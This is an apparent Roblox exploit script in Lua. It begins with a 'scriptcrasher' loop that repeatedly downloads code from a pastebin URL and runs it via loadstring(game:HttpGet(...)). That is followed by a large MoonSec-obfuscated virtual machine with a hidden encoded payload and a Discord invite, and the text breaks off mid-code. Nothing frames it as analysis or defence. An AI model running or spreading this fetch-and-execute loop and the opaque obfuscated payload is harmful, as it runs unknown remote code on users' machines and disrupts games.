spawn(function() --scriptcrasher
    getgenv().linkspammer1 = false
        while linkspammer1 do
            pcall(function()
                loadstring(game:HttpGet("https://pastebin.com/raw/4CHnND3T", true))()
            end)
        wait()
    end
end)


_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(e,l,d)local z=l[(0x4c3c/238)];local T=d[e[(-0x32+684)]][e[(-49+0x339)]];local c=(0x1d+-25)/(0x19-((-37+-0x48)+132))local r=(0x83-(289-((-0x79+36)+0xf5)))-(0x40-63)local Q=d[e[(-102+0xf7)]][e[(0x1dc-251)]];local y=(0x26-(-93+(0x176-(522-0x116))))+(41-0x27)local B=d[e[(0x444-569)]][e[(171191/0xc1)]]local o=(108+-0x6a)-(0x21+((-721280/0x73)/196))local t=(((-123+(-23+0xc38))/21)/0x47)local _=(((((0x256be-76667)-38325)+-126)/0x9f)/120)local h=((-0xc4-(-37+(-0x70+(0xbd+-119))))+119)local k=((0xf7+(0xd+((-0x2594/185)-10)))/0x63)local w=(278/((((-77+0xb)+1342806)/42)/230))local u=(39-((0x4fd-(-0x4b+760))/16))local g=(118+(-126+(89-(-108+0xb9))))local p=(0x134/(0x4830/((0xa726-21430)/0x59)))local N=(133-(0x4e9c/(((-76+0x422c)+-16)/0x6c)))local P=(((-0x4afd/((-0x10-22)+0x113))+136)+-51)local m=(31+(60-(199-(228+-0x74))))local S=(0x29-(-0x2e+(14442/(0x114+-102))))local i=(71-((15990-(16171-0x1fc9))/0x75))local s=((((5980/0xe6)+-0x30)+514)/0xa4)local f=((-0x54+(((15913503/0xdf)-35723)/0xce))+-0x56)local b=(0x201/(-0x35+(0x1ef-(0x41a2/(0xec6/61)))))local v=(-0x51+((-0x9c4/(0x46-50))+209))local V=((0xa7+((-37-0x28)+0x19))+-112)local I=e[(0x2f828/140)];local L=d[e[(26390/0xb6)]][e[(0x3f2-546)]];local C=d[(function(e)return type(e):sub(1,1)..'\101\116'end)('&#!*}.%_')..'\109\101'..('\116\97'or',.&;&^^+')..e[(0x22f+-36)]];local j=d[e[(0x48d-642)]][e[(0xf8ca/66)]];local Y=(390/0xc3)-(((0x8ad-1140)-0x247)/249)local W=((0xd4-(257+-0x5a))+-0x2b)-(100-0x62)local J=d[e[(-0x62+243)]][e[(422+(-0x2f4/28))]];local l=function(l,e)return l..e end local F=(117-0x71)*((0xd1+(-18476/0x95))+-0x51)local K=d[e[(0xde00/(-0x32+98))]];local x=(36/0x12)*(0xb9+((93+-0x2f)+-0x67))local G=(0x1ac00/107)*((-96+(-0x4c+(0x22c-334)))-0x30)local X=((0x13a-(10374/0x39))-80)local E=((50976/(27000/0xfa))/236)*(128/0x40)local M=d[e[((-0x3c+2162)-1061)]]or d[e[(120813/0xe7)]][e[((-0x3c+2162)-1061)]];local a=((74928/(538-0x13b))+-80)local e=d[e[(2541-0x51a)]];local B=(function(a)local x,d=1,0x10 local l={j={},v={}}local n=-o local e=d+r while true do l[a:sub(e,(function()e=x+e return e-r end)())]=(function()n=n+o return n end)()if n==(F-o)then n=""d=Y break end end local n=#a while e<n+r do l.v[d]=a:sub(e,(function()e=x+e return e-r end)())d=d+o if d%c==Y then d=W j(l.j,(J((l[l.v[W]]*F)+l[l.v[o]])))end end return B(l.j)end)("..:::MoonSec::..!*%&/+^,;.:_#$}=#:_:,:+%%:=!$__%;:^%...+}:#%.:,%/:%%*}*%*^;$+:&%!:%}%.=+#_:}^:+}%_*_$=#/%}*&$:_%;:#::};^+:&+$/:*,.;_+}&,*;=^;;.=^=**!#.%^:/%*:*!#}:%,:+%:*^&/&%^;}^:&:*%}:**!,#._+.+^#/*%%:!+}&%!:}%!%!*$,:,*}!^#::%,:_:.},^/:}#_..*._;%+&=!!&}%_&;;,&!!*.=/#*_;*/}%_:.%#.:*;$+,%$*,}#_,;=,&/^_^;:^%&:^^/=&:!}$}+*%%=:$%=%=^#}:%+*/,%};!^}/%*:=%&*!&},_,:==!}*_%;:^%;:,}/_&_==}/_$,/=$$%::;%:*:,,&!!#^.%^:/%,/&&&#!.#&_,,^/,+/=}}}:##!/^}:#%.:#;.:,!*:/**#:%:$:%;&!%*}=,$}:,,$^^%=!^._,&/:+^/=%/=;;%:&;^!:&*!!$;^:.^^.=%*==+_=+%,}/:*=_%$$:+;#+_&:*^:;:/;^!%$:_%=%$^:};%+$=##.:*_#;&,*!!**}_#}.:,=//%=!+#=_/,$^*&;*^$=#!.}&!&$%*=,.*:,;_+^%&=}}*_&.++#&_**_*#,:,,^/&*}!*$&_+;#+,%_!}}^#_;#^_/*}*=,#&:&;!*.%=*&$}:_;^^.&_*$=/_=.&,^/}&&=/$&:.;$+,%$**};_^%}*,$:_%;:#^:&;+/$&*!#$^,;;.^*!***$&.=,:&#+,*/!:_=:$*}=_#::%,::%.^^&+&*,=#:.:=,_;:#+.:,%/:^=/$*.*^_#+:&%!:&;!:}!;:_*;#*%*$*%=&,%;}^,/}*,}$$^.=,^!_}&_:,#^:,^^=//*;:%#&:^%:+*%!=;;::;;.^/}:*+$=_+.=,//&%^!&;%::;,+#&%!.}+:=.+%;!:_/;%+:&%,^+**_=^$$_^;#+_&;!.#%+%%:!%$##&;:^%&:*%}:#%.:;/,+%%=:$%_/;%+:&%!:}%_:.%^:/%*:=%#::%,:+%%_!%$:_%;:^%/#*%}:#&.:;&/:%%=:}/::;%+_&%!_}%_:.%.!/%*:=&#::_,:+&%:*^$:_^##^%&:*%=&#%._,%/:/^=:$%::;&+:&%!:}/#_.%^_/%*_=%#::%;#;*%:!&$:_.;:^%&:%/}:#%._,%+,%%=:$%#:;%+:&&!:}&_:.}^:+/*:=%#$:%;&+%%:!%$:_%;:^&&:*+}:#/.:.;/:%%=_$%#=;%+_&%*;}%_}$/^:/%*:*,#::&,:^//#!%$__%.,^%&:*%!:!#.:,&/:%&=:}*:::%+:&%!_}%__.%^$/%&:=%#::&,:+&%:*,$:$%;:^%&_*%}_#%::,%^:%%=:$&::;&+:&:!:!%_:.%^_/%*_=%}!:%::+%%:!&$:_$;:,/&:%/}:#%._,%+!%%=:$%_#;%+:&/!:}/_:.%^:/%*:=%#_:%,#+%%_!%}#$/;:^&&:*=}:#%.:.%;*%%=_$%:_;%^.&%%:}%_:.&^:/&*:=+#:#%,:+%%_!%$__%.=^%+:*%}:#&.:,&/:&%=:=%::;%+_&%!_}%#%.%;:/%*:=&#::&,:^;%:&%$:_%;_^%/+*%}=#%.:.^/:%%=:$&::;%+://%#}%__.%,,/%*:=%}:$_,:+&%:!&$:_};:,/&=*%}$#%.},%/:%%=:}*::;&+:&+!:}/_:_;_#/%*_=%=^:%,_+%&;!%$}=/;:^%&:&}}:#&.:,^;#%%=:$%}.;%+_&%*#!/_:.&^:/=*:=%#:#%#/+%%_!%$__%..^%+:*%}:#&.:,&/:%+=:=%::;%+_&%!_}%#=.%;:/%*:=&#::&,:^%%:%%$:_%;_^%&_*%=%#%_:,%/:%&=:$&::.;+:^%!:}%__.%,+/%&*=%$#:%,:+&%:!;$:_%;:,/&:*%}##%.#,%/:%%=:$%::;&+:&/!:}&_::/;#/%*_=%$,:%,:+%/:&.$:_&;:^&&:%*}:}%.:,%/_%%=_$%:$;%,:&%!:}&_:.&^:+,*:*%#::%,_+%%_!%}:_%::^%&:*&}:#&.:,:/:/%=:$%:_;%+_&%%!}%}:.%^:/&*:=$#::,,:^//#!%$__%:%^%&:*%=#!..:,//:%==:$%:::%+:&%!#}%_#.%,^/%%#=%#::^,:^+%:!%$:_%;:^%&=*%}_#%.:,%/:%%=:$/::;,+:&%!:}%_:.%^_/%*:=%##:%,:+%%:!&$:_&;:^&&:*%}:#%.:,%/_%%=:$%:#;%+:&%!#}/_:.%^:.**:=%#::%,:+%%:!%=;_,;:^%&:;%/$%&!^$}^^%%=:$%_#;,+:&/!:}&_:.%^:+/*==%#$:%,_+%%:!%}#$/;:^^&:*/}:#%.:,;,#%%==$%::;%+_&%!}}%_:$+^:/%*:=/#::%,:+%^$!%$:_%;:^%&:*%}:!+.:,%/:%+=:$%::;%.$&%!:}%__.%^:/%*:=/#::^,:+/%:!&$:_;./^%&:*%!%#%._,%/_%%=}*/::;%+:/:!:}&_:.;,//%*:=%}%:%,_+%%_!%$}=/;:^%&:%:}:#&.:,;+/%%=_$%#%;%+_&%!:}%_}$/^:/%*:!:#::&,:+%&*!%$}_%;#^%&$*%}:#..:,,/:%+=:$/::;;,;&%!}}%#}.%^_/%*==%#}}/,:+%%:*^$:_&;:^^,#*%}:#%_%,%/_%%=:$.::;^+:&/!:}+_:.%,*/%*==%#$:%,#+%&!%!$:_^;:,_&:*&}:#,.:,^;#%%=:$%#&;%+_&%!:}:_:.^^:/%*:=%#::%.$+%%}!%$__%;:^%&:*;}:#^.:,//:%%=:$%#};%+:&%!_}%_:.%^_/%*:=%#::%,:+%%:!.$:_%;:^%^:*%}:#%._,%/:%%=:$%::;%+:&%!:}%_:.%^:/%*:=%#::%,:+%%:!%$:_%;:^+&:*%}:#%.:,%/:%%=:$%::;%+:&%!:}%_:./^:/%*:=%#::%,:+%%_!%$:_%;:^%&:*%}$#:.:,%/:$#!!$%::;%#$:^,#/_%;=.^}/}*:=%#:=#__#/.*/_&==}#=$#;^,^&/}!.},%/:%%+#/_*}},:#&^!:}%_:=+$%:&;#:.#::%,:+%%:!%/:=%,;^%&:*%}:,..:,%/:%%=:$%.:#*}!&+!:}%_:!+$=:/&#=%#::%;#,/%:!+$:_/;:^%&:*%!^#%.$,%/$%%=_$%_!./+:&+!:},_:.&^:/&*:=^!#:%,:+%%=!%$__%;}:/&:*%}:#:.:,&/:&/*#$%:$;%+#&%!:}%_::}^:/+*:=+#::&,:+%&!!%$$_%;#^%&:*%=##,.:,+/:%.=:$%::./,&&%!}}%#!.%^:/%%#=%#::,,:+.%:!%$:_%;:^%/!*%}:#%.:,%+#%%=:$.::;.+:&%!:}^_:.%^=/%&;=%#_:%,:.,%:!_$:_^;:^%&:%/*%#%:/,%/_%%=:$%#:;%+:&#!:}#_:.^^:^%*:=%$+:%,:+%&%!%$:_%;:^=&:*:}:#%.:,%/:%%!;$%_%;%+:&%!:}%_:.$^:+!*:=/#:#%,:+%&+!%}+_%;$^%&:*%}:#$.:,//:%/=:$%::;%^+&%*+}%_$.%;:/%*:=$#::$,:+,%:!%$:_%./^%&#*%}##%.:,%/:%^=:$_::;#+:&%!:}%#&.%^$/%*#=%}::%,:++%:!_$:_,;:^^;%*%}=#%:;,%/_%%!#=/::;,+:&/!:}%_:.%.}/%*==%#_:%,}+%%:!;$:_^;:^/&:*%}:#%_},%/:%%=_$%::;%+:&%!:}%");local j=(2560/0x40)local d=54 local n=o;local e={}e={[(0xf2/242)]=function()local r,l,o,e=Q(B,n,n+y);n=n+E;d=(d+(j*E))%a;return(((e+d-(j)+x*(E*c))%x)*((c*G)^c))+(((o+d-(j*c)+x*(c^y))%a)*(x*a))+(((l+d-(j*y)+G)%a)*x)+((r+d-(j*E)+G)%a);end,[((-0x4d+185)/54)]=function(e,e,e)local e=Q(B,n,n);n=n+r;d=(d+(j))%a;return((e+d-(j)+G)%x);end,[(-0x15+24)]=function()local e,l=Q(B,n,n+c);d=(d+(j*c))%a;n=n+c;return(((l+d-(j)+x*(c*E))%x)*a)+((e+d-(j*c)+a*(c^y))%x);end,[(-115+0x77)]=function(d,e,l)if l then local e=(d/c^(e-o))%c^((l-r)-(e-o)+r);return e-e%o;else local e=c^(e-r);return(d%(e+e)>=e)and o or W;end;end,[(960/0xc0)]=function()local l=e[(0x2c-43)]();local n=e[(0x52+-81)]();local i=o;local d=(e[(0x3c-56)](n,r,F+E)*(c^(F*c)))+l;local l=e[(0x378/222)](n,21,31);local e=((-o)^e[(-0x37+59)](n,32));if(l==W)then if(d==Y)then return e*W;else l=r;i=Y;end;elseif(l==(x*(c^y))-r)then return(d==W)and(e*(r/Y))or(e*(W/Y));end;return T(e,l-((a*(E))-o))*(i+(d/(c^X)));end,[(-90+(-120+0xd8))]=function(l,c,c)local c;if(not l)then l=e[(-0x23+36)]();if(l==W)then return'';end;end;c=L(B,n,n+l-o);n=n+l;local e=''for l=r,#c do e=I(e,J((Q(L(c,l,l))+d)%a))d=(d+j)%x end return e;end}local function G(...)return{...},K('#',...)end local function B()local t={};local h={};local l={};local _={t,h,nil,l};local d={}local u=(0xa9-117)local n={[(0x172/185)]=(function(l)return not(#l==e[(0x1b2/(505-0x120))]())end),[(0x79-120)]=(function(l)return e[(122-0x75)]()end),[(69-0x41)]=(function(l)return e[(103-(0xda-121))]()end),[(0x10+(-3312/0xcf))]=(function(l)local d=e[(-0x5e+100)]()local e=''local l=1 for n=1,#d do l=(l+u)%a e=I(e,J((Q(d:sub(n,n))+l)%x))end return e end)};_[3]=e[(-0x2a+44)]();local l=e[(57+-0x38)]()for l=1,l do local e=e[(0xbc/94)]();local o;local e=n[e%((-0x651/21)+103)];d[l]=e and e({});end;for a=1,e[(-0x2c+45)]()do local l=e[(238/0x77)]();if(e[(304/0x4c)](l,o,r)==Y)then local x=e[(352/0x58)](l,c,y);local n=e[(75-0x47)](l,E,c+E);local l={e[(-58+0x3d)](),e[(0x25e/202)](),nil,nil};local i={[(0x0/210)]=function()l[f]=e[((-0x11+-104)+124)]();l[p]=e[(0xd5/71)]();end,[(121+-0x78)]=function()l[i]=e[((0x4aa6/182)/105)]();end,[(0x35-(155+-0x68))]=function()l[f]=e[(101+-0x64)]()-(c^F)end,[(510/0xaa)]=function()l[i]=e[(0xef/239)]()-(c^F)l[g]=e[(0x15c/116)]();end};i[x]();if(e[(4/0x1)](n,r,o)==r)then l[w]=d[l[k]]end if(e[(0x3f8/254)](n,c,c)==o)then l[v]=d[l[b]]end if(e[(0x7e+-122)](n,y,y)==r)then l[P]=d[l[p]]end t[a]=l;end end;for e=r,e[(-72+0x49)]()do h[e-r]=B();end;return _;end;local function W(e,E,j)local d=e[c];local a=e[y];local e=e[o];return(function(...)local n=o;local Y={};local J={};local F=d;local Q=G local y=-r;local x=e;local d={};local G=K('#',...)-r;local a=a;local B={...};for e=0,G do if(e>=a)then J[e-a]=B[e+r];else d[e]=B[e+o];end;end;local e=G-a+o local e;local a;while true do e=x[n];a=e[(0xb8/184)];l=(475912)while a<=(-0x54+125)do l=-l l=(130032)while a<=(0x98-132)do l=-l l=(3966844)while(78-0x45)>=a do l=-l l=(59000)while((0x2ab6/154)-0x43)>=a do l=-l l=(2717247)while a<=(-51+0x34)do l=-l l=(2370480)while(0/0xeb)<a do l=-l d[e[t]]=(e[s]~=0);n=n+r;break end while(l)/((0xa8570/169))==581 do local e={d,e};e[r][e[c][w]]=e[o][e[c][m]]+e[r][e[c][b]];break end;break;end while(l)/((-0x7d+2634))==1083 do l=(4716670)while a<=(194/0x61)do l=-l local e=e[h]d[e](d[e+r])break;end while(l)/((0x3aca0/80))==1567 do l=(3843468)while(95-0x5c)<a do l=-l do return d[e[w]]end break end while 1329==(l)/((0xb6d+-33))do d[e[w]]=d[e[s]]%e[S];break end;break;end break;end break;end while 2950==(l)/((0x31+(-38+0x9)))do l=(13474867)while(0x1bc/74)>=a do l=-l l=(8868706)while(94+-0x59)<a do l=-l do return d[e[h]]end break end while(l)/((0x17d4-3069))==2926 do d[e[h]]=e[v];break end;break;end while 3827==(l)/((0x4154c/76))do l=(776080)while a<=(128-0x79)do l=-l d[e[_]]=d[e[i]]-d[e[g]];break;end while(l)/(((128712+-0x5c)/0x76))==712 do l=(7249346)while(0x728/229)<a do l=-l d[e[_]][e[i]]=e[N];break end while 2707==(l)/((0xacf+-89))do d[e[k]]=(e[i]~=0);n=n+r;break end;break;end break;end break;end break;end while(l)/((757834/0xd1))==1094 do l=(660908)while a<=(-103+0x75)do l=-l l=(1353726)while(0x80-117)>=a do l=-l l=(4216320)while(0x3e-52)<a do l=-l d[e[h]]=d[e[b]][e[g]];break end while 2440==(l)/((110592/(0xac-108)))do if(d[e[h]]==d[e[S]])then n=n+r;else n=e[b];end;break end;break;end while 954==(l)/(((0x5d0+-20)+-49))do l=(3104244)while a<=(0x684/139)do l=-l local l=e[u];local o=d[l]local a=d[l+2];if(a>0)then if(o>d[l+1])then n=e[f];else d[l+3]=o;end elseif(o<d[l+1])then n=e[s];else d[l+3]=o;end break;end while(l)/((-57+0xdd5))==891 do l=(542828)while(60-0x2f)<a do l=-l d[e[k]]=E[e[s]];break end while 1859==(l)/((-0x49+365))do if not d[e[w]]then n=n+r;else n=e[v];end;break end;break;end break;end break;end while 508==(l)/((-0x71+1414))do l=(132840)while(0x80+-111)>=a do l=-l l=(6476994)while(0xa41/175)>=a do l=-l local l=e[t]d[l]=d[l](M(d,l+o,e[V]))break;end while(l)/((589806/(46872/0xd8)))==2383 do l=(2907904)while(-0x4c+92)<a do l=-l d[e[k]]=W(F[e[f]],nil,j);break end while(l)/((-0x56+2454))==1228 do d[e[u]]=d[e[b]][e[N]];break end;break;end break;end while 540==(l)/((525-0x117))do l=(4437792)while(-60+(245-0xa7))>=a do l=-l if not d[e[h]]then n=n+r;else n=e[i];end;break;end while(l)/((1405+(14-0x33)))==3244 do l=(294210)while a>(1273/0x43)do l=-l d[e[h]]();break end while 3269==(l)/((214-0x7c))do E[e[b]]=d[e[u]];break end;break;end break;end break;end break;end break;end while(l)/((0x19b-243))==774 do l=(8410934)while a<=(0x1cf2/247)do l=-l l=(10685820)while a<=(0x52+-57)do l=-l l=(11183764)while a<=(0x4b+-53)do l=-l l=(4603026)while a>(4557/0xd9)do l=-l local n=e[b];local l=d[n]for e=n+1,e[p]do l=l..d[e];end;d[e[_]]=l;break end while(l)/((5955-(-16+0xbee)))==1578 do do return end;break end;break;end while 3617==(l)/((0x1853-3135))do l=(2909520)while(2093/0x5b)>=a do l=-l local n=e[f];local l=d[n]for e=n+1,e[N]do l=l..d[e];end;d[e[u]]=l;break;end while 1796==(l)/(((103824/0x3f)+-0x1c))do l=(2077961)while(85-0x3d)<a do l=-l local r;local a;local l;d[e[w]]=e[f];n=n+o;e=x[n];d[e[_]]=e[i];n=n+o;e=x[n];d[e[k]]=#d[e[b]];n=n+o;e=x[n];d[e[k]]=e[s];n=n+o;e=x[n];l=e[h];a=d[l]r=d[l+2];if(r>0)then if(a>d[l+1])then n=e[b];else d[l+3]=a;end elseif(a<d[l+1])then n=e[v];else d[l+3]=a;end break end while 527==(l)/((0x9afc7/161))do local l=e[k];local n=d[e[V]];d[l+1]=n;d[l]=n[e[g]];break end;break;end break;end break;end while 3130==(l)/(((0x1b69-3570)+-33))do l=(3795656)while(0x6f6/66)>=a do l=-l l=(3800160)while a>(0xf22/149)do l=-l d[e[k]][d[e[b]]]=d[e[P]];break end while(l)/((0x78810/(0x13e+-92)))==1740 do local l=e[h]local n,e=Q(d[l](M(d,l+1,e[i])))y=e+l-1 local e=0;for l=l,y do e=e+o;d[l]=n[e];end;break end;break;end while 1754==(l)/((212072/(218+-0x78)))do l=(1114672)while(2548/0x5b)>=a do l=-l d[e[k]]=d[e[v]][d[e[p]]];break;end while(l)/((0x6b74/92))==3728 do l=(1499688)while a>(120+-0x5b)do l=-l if(d[e[h]]~=d[e[N]])then n=n+r;else n=e[f];end;break end while(l)/((0x5361c/179))==786 do d[e[w]]();break end;break;end break;end break;end break;end while 3019==(l)/(((0xab6a6+-46)/0xfc))do l=(673960)while a<=(490/0xe)do l=-l l=(1201214)while a<=(0x3c0/30)do l=-l l=(1509928)while(-87+0x76)<a do l=-l local e=e[_]d[e]=d[e](d[e+r])break end while 1652==(l)/((0x1f046/139))do local l=e[t]local n,e=Q(d[l](M(d,l+1,e[b])))y=e+l-1 local e=0;for l=l,y do e=e+o;d[l]=n[e];end;break end;break;end while 2513==(l)/((992-0x202))do l=(4196556)while(7227/(-0x71+332))>=a do l=-l d[e[w]]=j[e[i]];break;end while(l)/((0xc97-1637))==2646 do l=(6552000)while((0x1d0-276)-154)<a do l=-l d[e[t]]=(e[i]~=0);break end while 2800==(l)/((297180/0x7f))do d[e[_]]=j[e[i]];break end;break;end break;end break;end while 812==(l)/((901+-0x47))do l=(6244610)while a<=(0x4e+-40)do l=-l l=(639230)while a<=(188-0x98)do l=-l do return end;break;end while(l)/((0x2312e/109))==485 do l=(9604386)while(-0x76+155)<a do l=-l if(d[e[k]]==e[g])then n=n+r;else n=e[i];end;break end while 3762==(l)/((617826/(324+-0x52)))do d[e[w]]=E[e[V]];break end;break;end break;end while 1685==(l)/(((315078+-0x44)/0x55))do l=(2437472)while(0x68-65)>=a do l=-l d[e[k]]={};break;end while 2888==(l)/((54860/(0x98+-87)))do l=(1667430)while a>(0x82-90)do l=-l if(d[e[u]]==d[e[m]])then n=n+r;else n=e[b];end;break end while(l)/((3904-0x7ca))==873 do local E;local a;local u;local l;d[e[_]]=j[e[V]];n=n+o;e=x[n];d[e[w]]=d[e[b]][e[m]];n=n+o;e=x[n];l=e[w];u=d[e[b]];d[l+1]=u;d[l]=u[e[N]];n=n+o;e=x[n];d[e[k]]=d[e[f]];n=n+o;e=x[n];d[e[k]]=d[e[b]];n=n+o;e=x[n];l=e[k]d[l]=d[l](M(d,l+o,e[f]))n=n+o;e=x[n];l=e[w];u=d[e[b]];d[l+1]=u;d[l]=u[e[p]];n=n+o;e=x[n];l=e[h]d[l]=d[l](d[l+r])n=n+o;e=x[n];a={d,e};a[r][a[c][_]]=a[o][a[c][m]]+a[r][a[c][i]];n=n+o;e=x[n];d[e[h]]=d[e[b]]%e[N];n=n+o;e=x[n];l=e[h]d[l]=d[l](d[l+r])n=n+o;e=x[n];u=e[s];E=d[u]for e=u+1,e[g]do E=E..d[e];end;d[e[w]]=E;n=n+o;e=x[n];a={d,e};a[r][a[c][k]]=a[o][a[c][m]]+a[r][a[c][v]];n=n+o;e=x[n];d[e[t]]=d[e[b]]%e[P];break end;break;end break;end break;end break;end break;end break;end while 3131==(l)/((5776/0x26))do l=(14146336)while(0xae-112)>=a do l=-l l=(1319472)while a<=(184-0x85)do l=-l l=(6019216)while(130+-0x54)>=a do l=-l l=(1427618)while(201-0x9e)>=a do l=-l l=(74649)while a>(4704/0x70)do l=-l j[e[V]]=d[e[h]];n=n+o;e=x[n];d[e[h]]={};n=n+o;e=x[n];d[e[_]]={};n=n+o;e=x[n];j[e[V]]=d[e[t]];n=n+o;e=x[n];d[e[h]]=j[e[b]];n=n+o;e=x[n];if(d[e[_]]~=e[m])then n=n+r;else n=e[v];end;break end while 501==(l)/((-0x45+(31174/0x8f)))do local e=e[_]d[e](d[e+r])break end;break;end while(l)/((0xc61-1595))==907 do l=(1861040)while a<=(0xd5-(441-0x110))do l=-l d[e[_]][e[f]]=e[S];break;end while 860==(l)/((34624/0x10))do l=(2601822)while a>(0x6d-64)do l=-l d[e[h]]=W(F[e[b]],nil,j);break end while(l)/((0xd46-1745))==1574 do d[e[u]]=(e[i]~=0);break end;break;end break;end break;end while 3122==(l)/((0xf28-1952))do l=(186576)while(6144/0x80)>=a do l=-l l=(178240)while a>(1316/0x1c)do l=-l d[e[u]]=E[e[f]];n=n+o;e=x[n];d[e[u]]=#d[e[b]];n=n+o;e=x[n];E[e[v]]=d[e[_]];n=n+o;e=x[n];d[e[u]]=E[e[i]];n=n+o;e=x[n];d[e[_]]=#d[e[s]];n=n+o;e=x[n];E[e[b]]=d[e[_]];n=n+o;e=x[n];do return end;break end while(l)/((0x4b8+-94))==160 do local a;local l;j[e[V]]=d[e[_]];n=n+o;e=x[n];d[e[t]]=j[e[f]];n=n+o;e=x[n];l=e[u];a=d[e[s]];d[l+1]=a;d[l]=a[e[N]];n=n+o;e=x[n];d[e[h]]=e[i];n=n+o;e=x[n];l=e[t]d[l]=d[l](M(d,l+o,e[v]))n=n+o;e=x[n];if(d[e[t]]==e[P])then n=n+r;else n=e[b];end;break end;break;end while(l)/((0x6b18/149))==1014 do l=(2423136)while a<=(0xa4-115)do l=-l j[e[s]]=d[e[h]];break;end while(l)/((0x889+(-157+0x24)))==1174 do l=(275220)while a>(-82+0x84)do l=-l d[e[t]]=d[e[f]]-d[e[m]];break end while(l)/(((0x2bc7-5617)-0xafa))==99 do local c=F[e[v]];local a;local l={};a=C({},{__index=function(d,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,d)local e=l[e]e[1][e[2]]=d;end;});for o=1,e[S]do n=n+r;local e=x[n];if e[(0x4d-76)]==67 then l[o-1]={d,e[i]};else l[o-1]={E,e[i]};end;Y[#Y+1]=l;end;d[e[w]]=W(c,a,j);break end;break;end break;end break;end break;end while(l)/((0xd03+-97))==408 do l=(9885466)while a<=(0x1308/87)do l=-l l=(1360790)while a<=(-25+0x4e)do l=-l l=(3286978)while(-0x74+168)<a do l=-l local l;d[e[u]]=d[e[s]][e[g]];n=n+o;e=x[n];d[e[w]]=d[e[i]][e[S]];n=n+o;e=x[n];d[e[t]]=d[e[s]][e[P]];n=n+o;e=x[n];d[e[k]]=d[e[b]][e[N]];n=n+o;e=x[n];d[e[t]]=d[e[s]][e[S]];n=n+o;e=x[n];d[e[u]]=d[e[i]][e[g]];n=n+o;e=x[n];d[e[k]][e[V]]=e[N];n=n+o;e=x[n];d[e[u]]=j[e[i]];n=n+o;e=x[n];d[e[w]]=e[i];n=n+o;e=x[n];l=e[u]d[l](d[l+r])break end while 2122==(l)/((0x685+-120))do d[e[_]][d[e[i]]]=d[e[g]];break end;break;end while(l)/((0x16d28/228))==3319 do l=(12986224)while a<=(10044/0xba)do l=-l d[e[k]]=d[e[f]][d[e[S]]];break;end while 3704==(l)/((3545+-0x27))do l=(2724327)while(-0x43+122)<a do l=-l local e=e[h]d[e]=d[e](d[e+r])break end while(l)/((-0x47+2960))==943 do d[e[_]]=d[e[v]][e[g]];n=n+o;e=x[n];d[e[u]]=d[e[f]][e[S]];n=n+o;e=x[n];d[e[k]]=d[e[V]][e[g]];n=n+o;e=x[n];d[e[h]]=d[e[s]][e[p]];n=n+o;e=x[n];d[e[t]]=d[e[V]][e[g]];n=n+o;e=x[n];d[e[k]]=d[e[f]][e[P]];n=n+o;e=x[n];d[e[w]][e[i]]=e[g];break end;break;end break;end break;end while 2573==(l)/(((-107+0xe995d)/249))do l=(8060777)while a<=(0x5b+-32)do l=-l l=(3333024)while a<=(0x96+-93)do l=-l local l=e[w];local n=d[e[v]];d[l+1]=n;d[l]=n[e[m]];break;end while(l)/((336432/0x56))==852 do l=(460534)while(0xab+-113)<a do l=-l d[e[h]]=d[e[i]]%e[S];break end while 818==(l)/((0xf1ea/110))do local a=F[e[v]];local o;local l={};o=C({},{__index=function(d,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,d)local e=l[e]e[1][e[2]]=d;end;});for o=1,e[N]do n=n+r;local e=x[n];if e[(0x14-19)]==67 then l[o-1]={d,e[i]};else l[o-1]={E,e[v]};end;Y[#Y+1]=l;end;d[e[h]]=W(a,o,j);break end;break;end break;end while(l)/(((162096/0x2c)+-25))==2203 do l=(156168)while a<=(179-0x77)do l=-l d[e[h]]={};break;end while(l)/((720-0x18c))==482 do l=(3373480)while a>(0x1310/80)do l=-l d[e[t]]=d[e[f]][e[m]];n=n+o;e=x[n];d[e[t]]=d[e[b]][e[N]];n=n+o;e=x[n];d[e[_]]=d[e[s]][e[g]];n=n+o;e=x[n];d[e[h]]=d[e[f]][e[m]];n=n+o;e=x[n];d[e[u]]=d[e[b]][e[g]];n=n+o;e=x[n];d[e[h]]=d[e[i]][e[N]];n=n+o;e=x[n];d[e[w]][e[s]]=e[N];n=n+o;e=x[n];do return end;break end while(l)/((4928-0x9cc))==1394 do if(d[e[t]]~=d[e[g]])then n=n+r;else n=e[b];end;break end;break;end break;end break;end break;end break;end while(l)/((0x1fa2-4070))==3512 do l=(14934204)while a<=(9576/0x85)do l=-l l=(10329760)while(112+-0x2d)>=a do l=-l l=(6481709)while(-0x7e+190)>=a do l=-l l=(407150)while a>(0x15a8/88)do l=-l local l=e[u]d[l]=d[l](M(d,l+o,e[b]))break end while(l)/((0x9b4+-89))==170 do local e={d,e};e[r][e[c][h]]=e[o][e[c][g]]+e[r][e[c][s]];break end;break;end while 3587==(l)/((3674-0x74b))do l=(317638)while(4680/0x48)>=a do l=-l E[e[v]]=d[e[t]];break;end while(l)/((0x148+-87))==1318 do l=(162663)while a>(0xcc-138)do l=-l d[e[t]]=d[e[i]];break end while(l)/((0x9a-95))==2757 do n=e[v];break end;break;end break;end break;end while 4010==(l)/((0xa78+-104))do l=(6928694)while((0xa3c/20)+-62)>=a do l=-l l=(8010008)while a>((-0x51+296)-147)do l=-l d[e[t]]=d[e[v]];break end while(l)/((2876+-0x57))==2872 do d[e[k]]=e[i];break end;break;end while(l)/((290376/0x48))==1718 do l=(2307480)while a<=(0xa1+-91)do l=-l n=e[s];break;end while(l)/((1761-0x384))==2680 do l=(489951)while(93+-0x16)<a do l=-l local l=e[w];local a=d[l+2];local o=d[l]+a;d[l]=o;if(a>0)then if(o<=d[l+1])then n=e[s];d[l+3]=o;end elseif(o>=d[l+1])then n=e[i];d[l+3]=o;end break end while(l)/((0x32e+-121))==707 do local a;local c,b;local r;local l;d[e[h]]=j[e[V]];n=n+o;e=x[n];l=e[k];r=d[e[s]];d[l+1]=r;d[l]=r[e[m]];n=n+o;e=x[n];d[e[_]]=e[i];n=n+o;e=x[n];d[e[t]]=(e[s]~=0);n=n+o;e=x[n];l=e[t]c,b=Q(d[l](M(d,l+1,e[i])))y=b+l-1 a=0;for e=l,y do a=a+o;d[e]=c[a];end;n=n+o;e=x[n];l=e[_]d[l]=d[l](M(d,l+o,y))n=n+o;e=x[n];d[e[_]]();n=n+o;e=x[n];do return end;break end;break;end break;end break;end break;end while 3877==(l)/((7793-0xf65))do l=(9021804)while a<=(254-0xb1)do l=-l l=(408928)while 